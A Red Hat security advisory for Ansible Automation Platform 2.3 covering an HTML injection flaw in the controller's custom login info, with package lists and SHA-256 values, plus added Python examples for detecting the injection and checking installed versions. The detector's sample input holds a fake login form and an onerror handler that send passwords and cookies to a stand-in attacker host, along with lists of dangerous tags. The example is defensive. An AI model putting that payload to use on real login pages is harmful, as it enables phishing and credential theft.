RHSA-2023:4590: Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update

An update is now available for Red Hat Ansible Automation Platform 2.3.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:

  • CVE-2023-3971: An HTML injection flaw was found in Controller in the user interface settings. An attacker able to set the custom login info in those settings can inject HTML into the login page, for example a fake login form that captures the credentials users type in, resulting in a complete compromise.

Issued: 2023-08-09
Updated: 2023-08-09

RHSA-2023:4590 - Security Advisory

Synopsis

Moderate: Red Hat Ansible Automation Platform 2.3 Product Security and Bug Fix Update

Type/Severity

Security Advisory: Moderate

Description

Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.

Security Fix(es):

  • automation controller: HTML injection in custom login info (CVE-2023-3971)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
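As an added example that is not part of this advisory or of the controller code base, the following Python audits a CUSTOM_LOGIN_INFO value for the kind of injection described above: a fake login form posting off-host, script-bearing URLs and inline event handlers. It assumes the value has been read from the controller's UI settings endpoint (GET /api/v2/settings/ui/ is the path assumed here); the sample values are constructed, and the tag and attribute lists are this example's own choices, not the product's allowlist.

```python
# Added example, not Red Hat or AWX code: flag HTML injection in a controller's
# CUSTOM_LOGIN_INFO setting (the value rendered on the login page). The tag and
# attribute lists below are this example's own choices.
from html.parser import HTMLParser

# A login banner needs text markup only. Anything that collects input, runs
# script or loads remote content is a phishing or exfiltration primitive.
DANGEROUS_TAGS = {"form", "input", "button", "textarea", "select", "script", "iframe",
                  "frame", "object", "embed", "meta", "link", "base", "svg", "math"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "poster"}
SCRIPT_SCHEMES = {"javascript", "data", "vbscript"}


class LoginInfoAuditor(HTMLParser):
    """Collects findings while html.parser tokenises the setting value."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            name = name.lower()
            # Drop whitespace so 'java\tscript:' and '&#106;avascript:' (entities are
            # already decoded by the parser) are seen the way a browser sees them.
            compact = "".join((value or "").split()).lower()
            if name.startswith("on"):
                self.findings.append(f"<{tag}> has event handler {name}")
            elif name in URL_ATTRS:
                scheme = compact.partition(":")[0] if ":" in compact else ""
                if scheme in SCRIPT_SCHEMES:
                    self.findings.append(f"<{tag} {name}> uses {scheme}: URL")
                elif scheme in ("http", "https") or compact.startswith("//"):
                    self.findings.append(f"<{tag} {name}> points off-host: {value.strip()}")
            elif name == "style" and ("url(" in compact or "expression(" in compact):
                self.findings.append(f"<{tag}> inline style references a URL")


def find_html_injection(custom_login_info: str) -> list[str]:
    """Return findings for one CUSTOM_LOGIN_INFO value; an empty list means nothing suspicious."""
    auditor = LoginInfoAuditor()
    auditor.feed(custom_login_info or "")
    auditor.close()
    return auditor.findings


# Constructed sample values (not taken from any real controller).
BENIGN_LOGIN_INFO = "<p>Authorized users only. Contact the <b>IT helpdesk</b> for access.</p>"
INJECTED_LOGIN_INFO = (
    "<p>Your session expired, please sign in again.</p>"
    '<form action="https://collector.attacker.example/login" method="post">'
    '<input name="username"><input name="password" type="password">'
    "<button>Sign in</button></form>"
    "<img src=x onerror=\"fetch('https://collector.attacker.example/c?'+document.cookie)\">"
)

if __name__ == "__main__":
    for finding in find_html_injection(INJECTED_LOGIN_INFO):
        print(finding)
```

An empty result is not proof the setting is clean, only that none of the listed patterns appeared; the authoritative fix is the 4.3.11 build, which stops forms in the setting from rendering and executing (AAP-14627). A non-empty result on a controller whose administrators never customised the banner is an indicator of compromise and should trigger a review of who changed the setting and of any credentials entered through the login page since.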

Additional changes for automation controller:

  • automation-controller has been updated to 4.3.11 (AAP-14634)
  • receptor has been updated to 1.4.1 (AAP-14641)
  • Fixed a server error when deleting workflow jobs that ran before the event partitioning migration (AAP-7965)
  • Fixed a bug where users could get an erroneous 400 error when disabling or enabling a schedule (AAP-10943)
  • Fixed a bug that crashed the screen when changing the credential type dropdown in the launch prompt modal (AAP-11443)
  • Fixed slow database UPDATE statements when using nested tasks (include_tasks), which caused task manager timeouts (AAP-12585)
  • Fixed a bug where adding new labels to a job through prompting did not work (AAP-14205)
  • Re-enabled Pendo support by providing the correct Pendo API key (AAP-14214)
  • Added noopener and noreferrer to Controller UI links that were missing them (AAP-14346)
  • Updated links to docs from the subscriptions page to reflect only the major version being used (AAP-14376)
  • Turned off autocomplete on the remaining Controller UI forms that were missing that attribute (AAP-14443)
  • Fixed a bug where forms provided in the custom login info would render and execute (AAP-14627)

Other changes:

  • Initial release of aap-metrics-utility (AAP-14116)

Solution

Red Hat Ansible Automation Platform

Affected Products

  • Red Hat Ansible Automation Platform 2.3 for RHEL 9 x86_64
  • Red Hat Ansible Automation Platform 2.3 for RHEL 8 x86_64
  • Red Hat Ansible Inside 1.1 for RHEL 9 x86_64
  • Red Hat Ansible Inside 1.1 for RHEL 8 x86_64
  • Red Hat Ansible Developer 1.0 for RHEL 9 x86_64
  • Red Hat Ansible Developer 1.0 for RHEL 8 x86_64

Fixes

  • BZ - 2226965 - CVE-2023-3971 Controller: HTML injection in custom login info

Red Hat Ansible Automation Platform 2.3 for RHEL 9

SRPM

  • aap-metrics-utility-0.0.1-1.el9ap.src.rpm  SHA-256: 7f14df94f4c20333a97b119d362d6839208d6d5e5d07268dcf6165a70547f28f
  • automation-controller-4.3.11-1.el9ap.src.rpm  SHA-256: 9ee07adf5fa846a6f44adc5acd8b69ff932fa37f165085f04bfbe9e10c51024d
  • receptor-1.4.1-1.el9ap.src.rpm  SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356

x86_64

  • aap-metrics-utility-0.0.1-1.el9ap.noarch.rpm  SHA-256: 2301e65c3ce8e27881e03896f5cb721c08c3be7fd660113ed990ef77e69a3ec3
  • automation-controller-4.3.11-1.el9ap.x86_64.rpm  SHA-256: 2168b43483c0ece5c95a014331652c1b90bf3d03206cb9f686f012022617c0c0
  • automation-controller-cli-4.3.11-1.el9ap.x86_64.rpm  SHA-256: 54b3aa2454830d2e9c09bc71acce1c9348a6f8ad25e5231de22a1287b292933d
  • automation-controller-server-4.3.11-1.el9ap.x86_64.rpm  SHA-256: 99163dfa17eebd76f122eda5baa0cdfd974e27bb7bebc83cea1158e41d1338af
  • automation-controller-ui-4.3.11-1.el9ap.x86_64.rpm  SHA-256: ee51cc9fdef0ff468f3e909ace769ea6f08675e72e02f3e5df0230a97831ce58
  • automation-controller-venv-tower-4.3.11-1.el9ap.x86_64.rpm  SHA-256: 8630cbcab523dffc5976044bd5f6443bcb32ab05600617fb82d9cda590833d78
  • receptor-1.4.1-1.el9ap.x86_64.rpm  SHA-256: 8ed9b998593e0090e61cd9c5584631f8b54ce7cb185a44181107b32321faa0e7
  • receptorctl-1.4.1-1.el9ap.noarch.rpm  SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde

Red Hat Ansible Automation Platform 2.3 for RHEL 8

SRPM

  • aap-metrics-utility-0.0.1-1.el8ap.src.rpm  SHA-256: ac14922f6e98dd1f23e14f925edc0f2b3cb6d4bc2534c11cd818764e3ae499c3
  • automation-controller-4.3.11-1.el8ap.src.rpm  SHA-256: 4f9de69b7284d9c7f243b52c20640a15ee2a8370a9df40551f83afb5f2d5428c
  • receptor-1.4.1-1.el8ap.src.rpm  SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76

x86_64

  • aap-metrics-utility-0.0.1-1.el8ap.noarch.rpm  SHA-256: e2aa035ac5bb4dff6aba61c52ad8c00b476921f5238c660302b6a3802beffe47
  • automation-controller-4.3.11-1.el8ap.x86_64.rpm  SHA-256: 7bdfd7ec024924aee4b0f00d5f423a9b3747a7c9a3eeb93aba6fe0f9d336b4a9
  • automation-controller-cli-4.3.11-1.el8ap.x86_64.rpm  SHA-256: 69443cd3fa76ae98df4e88cc31b22139d8737de205a9d6075f787eb4be11b9e7
  • automation-controller-server-4.3.11-1.el8ap.x86_64.rpm  SHA-256: 2f1b5171041b94f85260fcee9b0aa801d8063a26d0b81a5ee251653df0bc0bc1
  • automation-controller-ui-4.3.11-1.el8ap.x86_64.rpm  SHA-256: 00784ed8eebe88e1e8faac9dc93e261fda7c3a7db5125469dfcf15e62cb6e3ad
  • automation-controller-venv-tower-4.3.11-1.el8ap.x86_64.rpm  SHA-256: 7b8e605eab2ce9cb69ebd7bd3a8278436f829196aa3881d5a2824f9c58993970
  • receptor-1.4.1-1.el8ap.x86_64.rpm  SHA-256: e5f6f5fec1daae6087c2fe09e050b8af2fbe288d262d59cf5a677a2a8258bfc2
  • receptorctl-1.4.1-1.el8ap.noarch.rpm  SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11

Red Hat Ansible Inside 1.1 for RHEL 9

SRPM

  • receptor-1.4.1-1.el9ap.src.rpm  SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356

x86_64

  • receptorctl-1.4.1-1.el9ap.noarch.rpm  SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde

Red Hat Ansible Inside 1.1 for RHEL 8

SRPM

  • receptor-1.4.1-1.el8ap.src.rpm  SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76

x86_64

  • receptorctl-1.4.1-1.el8ap.noarch.rpm  SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11

Red Hat Ansible Developer 1.0 for RHEL 9

SRPM

  • receptor-1.4.1-1.el9ap.src.rpm  SHA-256: 55d3fd42ea0337e1ae1dfea857189b13b97e57a3b1fe279f04282fcf82c0b356

x86_64

  • receptorctl-1.4.1-1.el9ap.noarch.rpm  SHA-256: 33803c1e7319e87ab819153c5e456c34244c3f09e26d1a8df17842646c2edcde

Red Hat Ansible Developer 1.0 for RHEL 8

SRPM

  • receptor-1.4.1-1.el8ap.src.rpm  SHA-256: 645a196c92f76e61b9a01c4e42c8a5db33fff05dec103a886bde8fb41ecbec76

x86_64

  • receptorctl-1.4.1-1.el8ap.noarch.rpm  SHA-256: 17d8bc11e4372481de53ca1a1b3c8d31164569f340a4f9a38cd9a5dd7cbdae11
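As an added example that is not part of this advisory, the following Python checks whether a host still runs pre-fix builds of the packages listed above and verifies a downloaded RPM against a SHA-256 value from the tables. It ports rpm's rpmvercmp ordering (tilde, caret, numeric-beats-alpha, leading zeros) so that version strings compare the way rpm itself compares them. The fixed version-release values are taken from this advisory; deriving the dist tag (el8ap or el9ap) from the installed package is this example's assumption, and the rpm -qa sample is constructed.

```python
# Added example, not Red Hat tooling: compare installed AAP 2.3 packages with the
# fixed builds in RHSA-2023:4590 using rpm's own version ordering.
import hashlib
import hmac

def rpmvercmp(a: str, b: str) -> int:
    """Port of rpm's rpmvercmp(): -1 if a < b, 0 if equal, 1 if a > b."""
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not a[i].isalnum() and a[i] not in "~^":
            i += 1  # separators other than ~ and ^ carry no meaning
        while j < len(b) and not b[j].isalnum() and b[j] not in "~^":
            j += 1
        ca, cb = a[i:i + 1], b[j:j + 1]
        if "~" in (ca, cb):  # pre-release marker: sorts before everything, even end of string
            if ca != cb:
                return 1 if cb == "~" else -1
            i, j = i + 1, j + 1
            continue
        if "^" in (ca, cb):  # post-release marker: after end of string, before anything else
            if ca != cb:
                if ca == "^":
                    return 1 if not cb else -1
                return -1 if not ca else 1
            i, j = i + 1, j + 1
            continue
        if not (ca and cb):
            break
        isnum = ca.isdigit()  # take a wholly numeric or wholly alphabetic segment from each side
        same_kind = str.isdigit if isnum else str.isalpha
        si, sj = i, j
        while si < len(a) and same_kind(a[si]):
            si += 1
        while sj < len(b) and same_kind(b[sj]):
            sj += 1
        seg_a, seg_b = a[i:si], b[j:sj]
        if not seg_b:  # mixed types: a numeric segment is newer than an alphabetic one
            return 1 if isnum else -1
        if isnum:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):  # more digits wins, no integer overflow
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
        i, j = si, sj
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1  # whichever still has characters left wins

def parse_evr(evr: str) -> tuple[str, str, str]:
    """Split '[epoch:]version-release'; rpm prints '(none)' for an unset epoch, meaning 0."""
    epoch, sep, rest = evr.partition(":")
    if not sep:
        epoch, rest = "0", evr
    version, _, release = rest.partition("-")
    return ("0" if epoch == "(none)" else epoch), version, release

def compare_evr(a: str, b: str) -> int:
    """Order two EVR strings the way rpm does: epoch first, then version, then release."""
    for x, y in zip(parse_evr(a), parse_evr(b)):
        if rc := rpmvercmp(x, y):
            return rc
    return 0

# Fixed version-release values from this advisory, without the dist tag.
FIXED_VR = {"receptor": "1.4.1-1", "receptorctl": "1.4.1-1"}
FIXED_VR.update((f"automation-controller{s}", "4.3.11-1")
                for s in ("", "-cli", "-server", "-ui", "-venv-tower"))

def outdated_packages(rpm_qa_output: str) -> dict[str, tuple[str, str]]:
    r"""Return {name: (installed EVR, fixed EVR)} for advisory packages still below the fix.

    Input is the output of: rpm -qa --qf '%{NAME} %{EPOCH}:%{VERSION}-%{RELEASE}\n'
    """
    outdated = {}
    for line in rpm_qa_output.split("\n"):
        if not line.strip():
            continue
        name, installed = line.split()
        if name in FIXED_VR:
            dist = parse_evr(installed)[2].rpartition(".")[2]  # el8ap/el9ap; assumed same for the fix
            fixed = f"0:{FIXED_VR[name]}.{dist}"
            if compare_evr(installed, fixed) < 0:
                outdated[name] = (installed, fixed)
    return outdated

def sha256_matches(rpm_bytes: bytes, expected_hex: str) -> bool:
    """Check a downloaded RPM against the SHA-256 listed in the advisory (constant-time compare)."""
    return hmac.compare_digest(hashlib.sha256(rpm_bytes).hexdigest(), expected_hex.strip().lower())

# Constructed rpm -qa output for a RHEL 9 controller node; not taken from a real host.
SAMPLE_RPM_QA = """\
automation-controller (none):4.3.10-1.el9ap
automation-controller-cli (none):4.3.11-1.el9ap
automation-controller-ui (none):4.3.10-1.el9ap
receptor (none):1.3.0-2.el9ap
receptorctl (none):1.3.0-2.el9ap
"""
```

A matching hash confirms that the file you downloaded is the one the advisory lists; it says nothing about who built it. Signature verification with rpm -K against Red Hat's release key is the check that establishes origin, and the version comparison above is what tells you whether the host is still exposed.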

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

Related news

  • CVE-2023-3971: Red Hat's CVE page for the HTML injection flaw in the Controller user interface settings fixed by this advisory.
  • Red Hat Security Advisory 2023-4590-01: another listing of this advisory (RHSA-2023:4590).
  • RHSA-2023:4340: Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update. Rated Moderate; fixes the same CVE-2023-3971 for Red Hat Ansible Automation Platform 2.4.